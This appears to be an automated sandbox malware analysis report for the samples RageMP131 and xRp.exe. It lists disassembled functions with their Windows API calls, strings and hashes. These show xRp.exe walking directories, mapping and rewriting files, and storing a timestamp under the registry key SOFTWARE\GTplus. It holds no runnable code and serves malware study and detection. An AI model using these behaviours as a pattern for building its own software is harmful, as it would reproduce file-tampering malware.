Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
Instruction ID: e8e903cddf8186aec111858d7a7d358ad1ec778b584b44c964f13b0e482ae77d
Opcode Fuzzy Hash: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
Instruction Fuzzy Hash: 4011D1B29007086FC710DF98D806F9ABBADAB05310F04852EFA5897641FB70A904CB91

Function 00631CF0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 006321D3

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
Instruction ID: 95e91ff012c5345b21686b1f9fa9293adedc9e5cc57e7d2f3423838f9a687f74
Opcode Fuzzy Hash: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
Instruction Fuzzy Hash: A5E1B071A006069FCB18DF68C991AA9B7F6FF49310F14826DE8199B391E730ED55CBD0

Function 005C8080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C844D

Strings

parse error, xrefs: 005C8149, 005C8162
ror, xrefs: 005C80D4

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
Instruction ID: 853fd2fd5c5519cad413f7c0fc1f0d17086b4acb7703937a64e8715e1cee8822
Opcode Fuzzy Hash: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
Instruction Fuzzy Hash: 1EC10471D006498FDB08CFA8CC85BADBBB6FF55304F14825CE405AB792DB74AA84CB91

Function 005C8920 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C8A93
___std_exception_copy.LIBVCRUNTIME ref: 005C8C71

Strings

ange, xrefs: 005C8B2F

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ange
API String ID: 2659868963-4159947239
Opcode ID: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
Instruction ID: 0c6b5584b240c17f2822e1b3ad8adc163248b61b1ba50006c93a1b53cf9148c3
Opcode Fuzzy Hash: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
Instruction Fuzzy Hash: 1AB1F271C002488FDB08CFA8CC84BADFBB5FF59314F14871DE4156B692EBB4A9848B55

Function 005C7DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 005C8051
___std_exception_destroy.LIBVCRUNTIME ref: 005C8060

Strings

[json.exception., xrefs: 005C7E1C

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
Instruction ID: 739ac8b6f9e0a082b8453ba1c7ec58e03e0489634cb541a9d70c331ff0b448d4
Opcode Fuzzy Hash: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
Instruction Fuzzy Hash: 6191FB719002089FDB18CFA8CC85FAEBFB6FF55310F14825DE411AB692D7749A84CB95

Function 005C3A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F

Strings

ios_base::failbit set, xrefs: 005C3AC8
ios_base::badbit set, xrefs: 005C3BA7, 005C3BD2, 005C3BF3

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
Instruction ID: da3b1ba33f1753143414024fba99a0588d353f96338eb558944ca793f97c8aae
Opcode Fuzzy Hash: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
Instruction Fuzzy Hash: 0541D3B5900608AFCB04DF98CC45FAABBB9FF45310F14822EF91497681E774AA40CBA5

Function 00633850 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006340B9
___std_exception_destroy.LIBVCRUNTIME ref: 006340D2
___std_exception_destroy.LIBVCRUNTIME ref: 00634BDD
___std_exception_destroy.LIBVCRUNTIME ref: 00634BF6

Strings

value, xrefs: 00634B03

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
Instruction ID: f7314916dd665d094b646be539a6baeb3f1de86f4bb2489a4800a81684d31477
Opcode Fuzzy Hash: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
Instruction Fuzzy Hash: 0051A1B0C00258DBDF14DFA4CC89BDEFBB6AF05304F14425DE445A7382DB746A888B95

Function 00638CC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00638D11

Strings

type must be string, but is , xrefs: 00638D78
type must be boolean, but is , xrefs: 00638E02

Memory Dump Source

Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
Instruction ID: 249041ac510b7200d517c3c378caea50c10c8fc366fc07cbf57b6fd2f4ef2e44
Opcode Fuzzy Hash: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
Instruction Fuzzy Hash: 223127B5900288AFDB14EBA4D846FEDB7AAEF11700F10056CF41597782EF34AA44CB96

Analysis Process: xRp.exePID: 8120, Parent PID: 8104COMMON

Execution Graph

Execution Coverage:	26.2%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	0%
Total number of Nodes:	299
Total number of Limit Nodes:	14

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00E329E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00E32A02
wsprintfA.USER32 ref: 00E32A1A
memset.MSVCRT ref: 00E32A44
lstrlen.KERNEL32(?), ref: 00E32A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E32A6C
strrchr.MSVCRT ref: 00E32A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E32A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00E32AAE
memset.MSVCRT ref: 00E32AC6
memset.MSVCRT ref: 00E32ADA
FindFirstFileA.KERNELBASE(?,?), ref: 00E32AEF
memset.MSVCRT ref: 00E32B13
lstrcmpiA.KERNEL32(?,?), ref: 00E32B42
FindNextFileA.KERNELBASE(00000000,?,?,00E32597,?), ref: 00E32B67
FindClose.KERNELBASE(00000000), ref: 00E32B6E

Strings

C:\, xrefs: 00E32A2F
Documents and Settings, xrefs: 00E32A8D, 00E32A92, 00E32A9A, 00E32AAD
%s*, xrefs: 00E32A14

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 573302995ddc139bad69c55a6f6a47572babad9b4dd0e7adf12ddfd12e1f81e9
Instruction ID: 2d9e75a2ca6eb327920b1a07ad694b6bc7c5abcc80b85759e6f38094e2a6e060
Opcode Fuzzy Hash: 573302995ddc139bad69c55a6f6a47572babad9b4dd0e7adf12ddfd12e1f81e9
Instruction Fuzzy Hash: 594132B2804349AFD720DBA1DC4DDEBBFECEB84315F041829B684E2151E6359648CBA1

Function 00E36076 Relevance: 14.6, APIs: 7, Strings: 1, Instructions: 614
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00E360BE
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00E360DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00E36189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00E361A5

Strings

kernel32.dll, xrefs: 00E364A7

Memory Dump Source

Source File: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: kernel32.dll
API String ID: 2087232378-1793498882
Opcode ID: 4618d0a2ddede282a958458a193efd6e13d01b37ab7098c2d0a74775aedc443a
Instruction ID: 29834befba861b7f732a4209acc37055579e12f73a99d021fd3eb51066443aab
Opcode Fuzzy Hash: 4618d0a2ddede282a958458a193efd6e13d01b37ab7098c2d0a74775aedc443a
Instruction Fuzzy Hash: 7E124672508784AFDB328F34CC49BEA7FB0EF02314F1995ADD889AB1A3D674A901C755

Function 00E31718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E31729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00E3174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00E3177C
__aulldiv.LIBCMT ref: 00E31796
__aulldiv.LIBCMT ref: 00E317A8

Strings

SOFTWARE\GTplus, xrefs: 00E31742, 00E3176B
Time, xrefs: 00E3173D, 00E31766
C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E31722

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-3211683193
Opcode ID: d8a323c89bb5efbe20754620ecfb8b0fa84858bd38b1db1e2138c035d968b592
Instruction ID: 6038e788e84d22ed4a7f4b06e6b18d75a8ebcd53d4f137234605b55ffe9ea2ac
Opcode Fuzzy Hash: d8a323c89bb5efbe20754620ecfb8b0fa84858bd38b1db1e2138c035d968b592
Instruction Fuzzy Hash: 37114675A00209BBDB209BA4CC8DFEFBFBCEB45B14F109159FA01B6141D6759A44CB60

Function 00E31E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE(00E32597,00000080,00E32597,00E332B0,00000164,00E32986,?), ref: 00E31EB9
CreateFileA.KERNELBASE(00E32597,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00E31ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00E31EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00E31F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00E31F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00E3201E
memset.MSVCRT ref: 00E320D8
memset.MSVCRT ref: 00E320EA
memcpy.MSVCRT ref: 00E3222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E32238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E3224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322DD
WriteFile.KERNEL32(000000FF,00E34008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E322F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E3230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00E32322
UnmapViewOfFile.KERNEL32(?,00E32597,00E332B0,00000164,00E32986,?), ref: 00E32340
CloseHandle.KERNEL32(?,00E32597,00E332B0,00000164,00E32986,?), ref: 00E3234E
CloseHandle.KERNEL32(000000FF,00E32597,00E332B0,00000164,00E32986,?), ref: 00E32359

Strings

m@, xrefs: 00E31E8F, 00E3225A
C@, xrefs: 00E3229E
5@, xrefs: 00E32282
<@, xrefs: 00E32290
.@, xrefs: 00E32274

Memory Dump Source

Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_e30000_xRp.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@$5@$<@$C@$m@
API String ID: 3043204753-519767493
Opcode ID: 180074bd1eca1feddc1052b657232437506130df20c51e6546f9c259b6072d01
Instruction ID: 029b33bb3f3f1ba230a4fd1ba468a8fbb4a78edb55da6dbf249f353039aa5471
Opcode Fuzzy Hash: 180074bd1eca1feddc1052b657232437506130df20c51e6546f9c259b6072d01
Instruction Fuzzy Hash: 7BF14671900209EFCB24DFA4D888AADBBB5FF08314F10956DE649B76A1D734AD85CF50

Function 00E3274A Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

